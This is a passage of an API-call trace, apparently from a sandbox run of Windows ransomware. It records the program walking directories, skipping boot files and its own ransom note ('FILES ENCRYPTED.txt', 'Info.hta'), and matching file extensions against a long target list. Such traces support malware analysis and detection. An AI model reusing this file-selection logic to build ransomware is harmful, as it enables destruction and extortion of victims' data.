(lpString="desktop.ini") returned 11 [0167.023] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0167.023] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0167.023] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0167.023] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0167.023] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0167.023] lstrcmpiW (lpString1="FILES ENCRYPTED.txt", lpString2="desktop.ini") returned 1 [0167.023] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0167.023] lstrcmpiW (lpString1="wdgmug.exe", lpString2="desktop.ini") returned 1 [0167.023] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0167.023] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0167.024] FindClose (in: hFindFile=0x729458 | out: hFindFile=0x729458) returned 1 [0167.024] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0167.024] FindNextFileW (in: hFindFile=0x729318, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0167.024] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 61 [0167.024] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 1 [0167.024] lstrlenW (lpString="S-1-5-21-1051304884-625712362-2192934891-1000") returned 45 [0167.024] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="S-1-5-21-1051304884-625712362-2192934891-1000") returned -1 [0167.024] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0167.024] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 61 [0167.024] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x729458 [0167.025] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.025] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.025] lstrlenW (lpString="desktop.ini") returned 11 [0167.025] lstrlenW (lpString=".1cd") returned 4 [0167.025] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0167.327] lstrlenW (lpString=".3ds") returned 4 [0167.327] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0167.327] lstrlenW (lpString=".3fr") returned 4 [0167.327] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0167.327] lstrlenW (lpString=".3g2") returned 4 [0167.327] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0167.328] lstrlenW (lpString=".3gp") returned 4 [0167.328] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0167.328] lstrlenW (lpString=".7z") returned 3 [0167.328] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0167.328] lstrlenW (lpString=".accda") returned 6 [0167.328] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0167.328] lstrlenW (lpString=".accdb") returned 6 [0167.328] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0167.328] lstrlenW (lpString=".accdc") returned 6 [0167.328] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0167.329] lstrlenW (lpString=".accde") returned 6 [0167.329] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0167.329] lstrlenW (lpString=".accdt") returned 6 [0167.329] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0167.329] lstrlenW (lpString=".accdw") returned 6 [0167.329] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0167.329] lstrlenW (lpString=".adb") returned 4 [0167.329] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0167.329] lstrlenW (lpString=".adp") returned 4 [0167.329] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0167.329] lstrlenW (lpString=".ai") returned 3 [0167.329] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0167.329] lstrlenW (lpString=".ai3") returned 4 [0167.329] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".ai4") returned 4 [0167.330] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".ai5") returned 4 [0167.330] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".ai6") returned 4 [0167.330] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".ai7") returned 4 [0167.330] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".ai8") returned 4 [0167.330] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".anim") returned 5 [0167.330] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0167.330] lstrlenW (lpString=".arw") returned 4 [0167.330] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".as") returned 3 [0167.330] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0167.330] lstrlenW (lpString=".asa") returned 4 [0167.330] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".asc") returned 4 [0167.330] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".ascx") returned 5 [0167.330] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0167.330] lstrlenW (lpString=".asm") returned 4 [0167.330] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".asmx") returned 5 [0167.330] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0167.330] lstrlenW (lpString=".asp") returned 4 [0167.330] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0167.330] lstrlenW (lpString=".aspx") returned 5 [0167.331] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0167.331] lstrlenW (lpString=".asr") returned 4 [0167.331] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".asx") returned 4 [0167.331] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".avi") returned 4 [0167.331] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".avs") returned 4 [0167.331] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".backup") returned 7 [0167.331] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0167.331] lstrlenW (lpString=".bak") returned 4 [0167.331] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".bay") returned 4 [0167.331] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".bd") returned 3 [0167.331] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0167.331] lstrlenW (lpString=".bin") returned 4 [0167.331] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".bmp") returned 4 [0167.331] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".bz2") returned 4 [0167.331] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".c") returned 2 [0167.331] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0167.331] lstrlenW (lpString=".cdr") returned 4 [0167.331] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0167.331] lstrlenW (lpString=".cer") returned 4 [0167.331] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".cf") returned 3 [0167.332] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0167.332] lstrlenW (lpString=".cfc") returned 4 [0167.332] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".cfm") returned 4 [0167.332] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".cfml") returned 5 [0167.332] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0167.332] lstrlenW (lpString=".cfu") returned 4 [0167.332] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".chm") returned 4 [0167.332] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".cin") returned 4 [0167.332] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".class") returned 6 [0167.332] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0167.332] lstrlenW (lpString=".clx") returned 4 [0167.332] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".config") returned 7 [0167.332] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0167.332] lstrlenW (lpString=".cpp") returned 4 [0167.332] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".cr2") returned 4 [0167.332] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".crt") returned 4 [0167.332] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".crw") returned 4 [0167.332] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0167.332] lstrlenW (lpString=".cs") returned 3 [0167.333] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0167.333] lstrlenW (lpString=".css") returned 4 [0167.333] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".csv") returned 4 [0167.333] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".cub") returned 4 [0167.333] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".dae") returned 4 [0167.333] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".dat") returned 4 [0167.333] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".db") returned 3 [0167.333] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0167.333] lstrlenW (lpString=".dbf") returned 4 [0167.333] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".dbx") returned 4 [0167.333] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".dc3") returned 4 [0167.333] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".dcm") returned 4 [0167.333] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".dcr") returned 4 [0167.333] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".der") returned 4 [0167.333] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".dib") returned 4 [0167.333] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0167.333] lstrlenW (lpString=".dic") returned 4 [0167.333] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0167.334] lstrlenW (lpString=".dif") returned 4 [0167.334] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0167.334] lstrlenW (lpString=".divx") returned 5 [0167.334] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0167.334] lstrlenW (lpString=".djvu") returned 5 [0167.334] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0167.334] lstrlenW (lpString=".dng") returned 4 [0167.334] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0167.334] lstrlenW (lpString=".doc") returned 4 [0167.334] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0167.334] lstrlenW (lpString=".docm") returned 5 [0167.334] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0167.334] lstrlenW (lpString=".docx") returned 5 [0167.334] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0167.334] lstrlenW (lpString=".dot") returned 4 [0167.334] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0167.334] lstrlenW (lpString=".dotm") returned 5 [0167.334] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0167.334] lstrlenW (lpString=".dotx") returned 5 [0167.334] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0167.334] lstrlenW (lpString=".dpx") returned 4 [0167.334] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0167.334] lstrlenW (lpString=".dqy") returned 4 [0167.334] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0167.334] lstrlenW (lpString=".dsn") returned 4 [0167.334] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0167.334] lstrlenW (lpString=".dt") returned 3 [0167.334] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0167.334] lstrlenW (lpString=".dtd") returned 4 [0167.335] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".dwg") returned 4 [0167.335] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".dwt") returned 4 [0167.335] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".dx") returned 3 [0167.335] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0167.335] lstrlenW (lpString=".dxf") returned 4 [0167.335] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".edml") returned 5 [0167.335] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0167.335] lstrlenW (lpString=".efd") returned 4 [0167.335] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".elf") returned 4 [0167.335] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".emf") returned 4 [0167.335] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".emz") returned 4 [0167.335] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".epf") returned 4 [0167.335] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".eps") returned 4 [0167.335] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0167.335] lstrlenW (lpString=".epsf") returned 5 [0167.335] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0167.335] lstrlenW (lpString=".epsp") returned 5 [0167.335] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0167.335] lstrlenW (lpString=".erf") returned 4 [0167.335] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0167.336] lstrlenW (lpString=".exr") returned 4 [0167.336] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0167.336] lstrlenW (lpString=".f4v") returned 4 [0167.336] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0167.336] lstrlenW (lpString=".fido") returned 5 [0167.336] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0167.336] lstrlenW (lpString=".flm") returned 4 [0167.336] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0167.336] lstrlenW (lpString=".flv") returned 4 [0167.336] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0167.336] lstrlenW (lpString=".frm") returned 4 [0167.336] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0167.336] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0167.336] FindClose (in: hFindFile=0x729458 | out: hFindFile=0x729458) returned 1 [0167.336] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0167.336] FindNextFileW (in: hFindFile=0x729318, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0167.336] FindClose (in: hFindFile=0x729318 | out: hFindFile=0x729318) returned 1 [0167.337] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x31f0050 | out: hHeap=0x710000) returned 1 [0167.338] FindNextFileW (in: hFindFile=0x729758, lpFindFileData=0x2d6fcf8 | out: lpFindFileData=0x2d6fcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0167.338] FindNextFileW (in: hFindFile=0x729758, lpFindFileData=0x2d6fcf8 | out: lpFindFileData=0x2d6fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0167.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x31f0050 [0167.341] lstrlenW (lpString="C:\\588bce7c90097ed212") returned 21 [0167.341] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x8025d8 [0167.578] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0167.764] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1025", cAlternateFileName="")) returned 1 [0167.764] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025") returned 26 [0167.764] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212\\1025") returned 1 [0167.764] lstrlenW (lpString="1025") returned 4 [0167.764] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="1025") returned 1 [0167.764] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0167.798] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025") returned 26 [0167.798] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x801ed8 [0167.798] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.799] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0167.799] lstrlenW (lpString="eula.rtf") returned 8 [0167.799] lstrlenW (lpString=".1cd") returned 4 [0167.799] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0167.799] lstrlenW (lpString=".3ds") returned 4 [0167.799] lstrcmpiW (lpString1=".3ds", lpString2=".rtf") returned -1 [0167.799] lstrlenW (lpString=".3fr") returned 4 [0167.799] lstrcmpiW (lpString1=".3fr", lpString2=".rtf") returned -1 [0167.799] lstrlenW (lpString=".3g2") returned 4 [0167.799] lstrcmpiW (lpString1=".3g2", lpString2=".rtf") returned -1 [0167.799] lstrlenW (lpString=".3gp") returned 4 [0167.799] lstrcmpiW (lpString1=".3gp", lpString2=".rtf") returned -1 [0167.799] lstrlenW (lpString=".7z") returned 3 [0167.799] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0167.799] lstrlenW (lpString=".accda") returned 6 [0167.799] lstrcmpiW (lpString1=".accda", lpString2="la.rtf") returned -1 [0167.799] lstrlenW (lpString=".accdb") returned 6 [0167.799] lstrcmpiW (lpString1=".accdb", lpString2="la.rtf") returned -1 [0167.799] lstrlenW (lpString=".accdc") returned 6 [0167.799] lstrcmpiW (lpString1=".accdc", lpString2="la.rtf") returned -1 [0167.799] lstrlenW (lpString=".accde") returned 6 [0167.799] lstrcmpiW (lpString1=".accde", lpString2="la.rtf") returned -1 [0167.799] lstrlenW (lpString=".accdt") returned 6 [0167.799] lstrcmpiW (lpString1=".accdt", lpString2="la.rtf") returned -1 [0167.799] lstrlenW (lpString=".accdw") returned 6 [0167.799] lstrcmpiW (lpString1=".accdw", lpString2="la.rtf") returned -1 [0167.799] lstrlenW (lpString=".adb") returned 4 [0167.799] lstrcmpiW (lpString1=".adb", lpString2=".rtf") returned -1 [0167.799] lstrlenW (lpString=".adp") returned 4 [0167.799] lstrcmpiW (lpString1=".adp", lpString2=".rtf") returned -1 [0167.799] lstrlenW (lpString=".ai") returned 3 [0167.799] lstrcmpiW (lpString1=".ai", lpString2="rtf") returned -1 [0167.799] lstrlenW (lpString=".ai3") returned 4 [0167.800] lstrcmpiW (lpString1=".ai3", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".ai4") returned 4 [0167.800] lstrcmpiW (lpString1=".ai4", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".ai5") returned 4 [0167.800] lstrcmpiW (lpString1=".ai5", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".ai6") returned 4 [0167.800] lstrcmpiW (lpString1=".ai6", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".ai7") returned 4 [0167.800] lstrcmpiW (lpString1=".ai7", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".ai8") returned 4 [0167.800] lstrcmpiW (lpString1=".ai8", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".anim") returned 5 [0167.800] lstrcmpiW (lpString1=".anim", lpString2="a.rtf") returned -1 [0167.800] lstrlenW (lpString=".arw") returned 4 [0167.800] lstrcmpiW (lpString1=".arw", lpString2=".rtf") returned -1 [0167.800] 